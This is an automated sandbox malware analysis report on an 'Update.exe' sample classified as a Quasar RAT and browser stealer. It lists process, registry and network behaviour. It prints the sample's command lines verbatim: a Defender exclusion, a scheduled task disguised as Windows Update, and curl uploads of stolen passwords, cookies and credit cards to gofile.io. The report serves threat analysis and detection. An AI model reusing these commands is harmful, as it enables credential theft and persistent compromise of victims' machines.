Malware Analysis Report

2024-08-06 11:49

Sample ID 240608-yz4gesff6w
Target Update.exe
SHA256 4a424271b9a191afc76110e2bccd45f23cc281853f223d3e27756e16c14b5019
Tags
quasar emmassub discovery execution pyinstaller spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4a424271b9a191afc76110e2bccd45f23cc281853f223d3e27756e16c14b5019

Threat Level: Known bad

The file Update.exe was found to be: Known bad.

Malicious Activity Summary

quasar emmassub discovery execution pyinstaller spyware stealer trojan

Quasar RAT

Quasar payload

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Drops startup file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Drops file in System32 directory

Drops file in Program Files directory

Unsigned PE

Detects Pyinstaller

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Enumerates processes with tasklist

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Modifies registry class

Suspicious use of SetWindowsHookEx

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Scheduled Task/Job
T1053
Persistence
TA0003
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Process Discovery
T1057
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-08 20:14

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-08 20:14

Reported

2024-06-08 20:16

Platform

win10-20240404-en

Max time kernel

112s

Max time network

80s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Update.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PF1B4.tmp\Update.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4228 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\Update.exe C:\Users\Admin\AppData\Local\Temp\is-PF1B4.tmp\Update.tmp
PID 4228 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\Update.exe C:\Users\Admin\AppData\Local\Temp\is-PF1B4.tmp\Update.tmp
PID 4228 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\Update.exe C:\Users\Admin\AppData\Local\Temp\is-PF1B4.tmp\Update.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\Update.exe

"C:\Users\Admin\AppData\Local\Temp\Update.exe"

C:\Users\Admin\AppData\Local\Temp\is-PF1B4.tmp\Update.tmp

"C:\Users\Admin\AppData\Local\Temp\is-PF1B4.tmp\Update.tmp" /SL5="$300E2,20549816,832512,C:\Users\Admin\AppData\Local\Temp\Update.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/4228-0-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/4228-2-0x0000000000401000-0x00000000004B7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PF1B4.tmp\Update.tmp

MD5 6a4ac87c4331dc724e6fea16e0ab4b7e
SHA1 3dcab7b5fc73352c01eb24e827626670fa323cec
SHA256 3b9ccf0ba93ecc3640ec5637d3bcfa030c260e6a6222ac7a4bebdd0a91af9a66
SHA512 dc8e3c8a90cd7751f069c5e00c40abbd66a407eeea783829c82242ff9d52fa9389220aed896705dd81911a9d007d3a394cb24c7c3c1e08020bbc2d3c371a9eb6

memory/4352-6-0x0000000000400000-0x000000000071C000-memory.dmp

memory/4228-8-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/4352-9-0x0000000000400000-0x000000000071C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-08 20:14

Reported

2024-06-08 20:16

Platform

win10v2004-20240508-en

Max time kernel

114s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Update.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe C:\Program Files (x86)\MyFolder\creal.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
N/A N/A C:\Program Files (x86)\MyFolder\RunMe.exe N/A
N/A N/A C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\RunMe.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\unins000.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A
N/A N/A C:\Program Files (x86)\MyFolder\creal.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe C:\Program Files (x86)\MyFolder\RunMe.exe N/A
File opened for modification C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe C:\Program Files (x86)\MyFolder\RunMe.exe N/A
File opened for modification C:\Windows\system32\WindowsSecureManager C:\Program Files (x86)\MyFolder\RunMe.exe N/A
File opened for modification C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe N/A
File opened for modification C:\Windows\system32\WindowsSecureManager C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\MyFolder\creal.exe C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
File created C:\Program Files (x86)\MyFolder\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
File created C:\Program Files (x86)\MyFolder\is-P0LJN.tmp C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
File opened for modification C:\Program Files (x86)\MyFolder\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
File opened for modification C:\Program Files (x86)\MyFolder\unins000.dat C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp N/A
File opened for modification C:\Program Files (x86)\MyFolder\RunMe.exe C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
File created C:\Program Files (x86)\MyFolder\is-OOH5M.tmp C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
File created C:\Program Files (x86)\MyFolder\is-I605I.tmp C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
File created C:\Program Files (x86)\MyFolder\is-J80I7.tmp C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\shell C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.myp\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\TstFile.myp C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\TstFile.myp\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\DefaultIcon\ = "C:\\Program Files (x86)\\MyFolder\\RunMe.exe,0" C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Applications\RunMe.exe\SupportedTypes\.myp C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\TSTFILE.MYP\DEFAULTICON C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\ = "Tst File" C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\shell\open\command\ = "\"C:\\Program Files (x86)\\MyFolder\\RunMe.exe\" \"%1\"" C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\Applications\RunMe.exe\SupportedTypes C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Applications C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\TSTFILE.MYP\SHELL\OPEN\COMMAND C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.myp\OpenWithProgids\TstFile.myp C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\shell\open C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Applications\RunMe.exe\SupportedTypes C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.myp C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.myp\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\TstFile.myp\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Applications\RunMe.exe C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\shell\open C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\shell C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\MyFolder\RunMe.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\MyFolder\RunMe.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1016 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Update.exe C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp
PID 1016 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Update.exe C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp
PID 1016 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Update.exe C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp
PID 944 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp C:\Windows\SysWOW64\cmd.exe
PID 944 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp C:\Windows\SysWOW64\cmd.exe
PID 944 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3036 wrote to memory of 2152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3036 wrote to memory of 2152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp C:\Program Files (x86)\MyFolder\RunMe.exe
PID 944 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp C:\Program Files (x86)\MyFolder\RunMe.exe
PID 4248 wrote to memory of 5096 N/A C:\Program Files (x86)\MyFolder\RunMe.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4248 wrote to memory of 5096 N/A C:\Program Files (x86)\MyFolder\RunMe.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4248 wrote to memory of 4612 N/A C:\Program Files (x86)\MyFolder\RunMe.exe C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe
PID 4248 wrote to memory of 4612 N/A C:\Program Files (x86)\MyFolder\RunMe.exe C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe
PID 4612 wrote to memory of 4528 N/A C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4612 wrote to memory of 4528 N/A C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2844 wrote to memory of 736 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Program Files (x86)\MyFolder\creal.exe
PID 2844 wrote to memory of 736 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Program Files (x86)\MyFolder\creal.exe
PID 736 wrote to memory of 1832 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 1832 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 3404 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 3404 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3404 wrote to memory of 464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 736 wrote to memory of 2884 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 2884 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 2884 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2884 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 736 wrote to memory of 3020 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 3020 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3020 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 736 wrote to memory of 4808 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 4808 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 4808 wrote to memory of 400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4808 wrote to memory of 400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 736 wrote to memory of 3428 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 3428 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 3428 wrote to memory of 392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3428 wrote to memory of 392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 736 wrote to memory of 3064 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 3064 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3064 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 736 wrote to memory of 5036 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 5036 N/A C:\Program Files (x86)\MyFolder\creal.exe C:\Windows\system32\cmd.exe
PID 5036 wrote to memory of 616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 5036 wrote to memory of 616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1056 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1524 wrote to memory of 4224 N/A C:\Program Files (x86)\MyFolder\unins000.exe C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp
PID 1524 wrote to memory of 4224 N/A C:\Program Files (x86)\MyFolder\unins000.exe C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp
PID 1524 wrote to memory of 4224 N/A C:\Program Files (x86)\MyFolder\unins000.exe C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Update.exe

"C:\Users\Admin\AppData\Local\Temp\Update.exe"

C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp

"C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp" /SL5="$D0068,20549816,832512,C:\Users\Admin\AppData\Local\Temp\Update.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C ""C:\Program Files (x86)\MyFolder\me.bat""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionProcess 'C:\WINDOWS\system32\WindowsSecureManager\RuntimeBroker.exe'"

C:\Program Files (x86)\MyFolder\RunMe.exe

"C:\Program Files (x86)\MyFolder\RunMe.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe

"C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\MyFolder\RunMe.exe

"C:\Program Files (x86)\MyFolder\RunMe.exe"

C:\Program Files (x86)\MyFolder\creal.exe

"C:\Program Files (x86)\MyFolder\creal.exe"

C:\Program Files (x86)\MyFolder\creal.exe

"C:\Program Files (x86)\MyFolder\creal.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

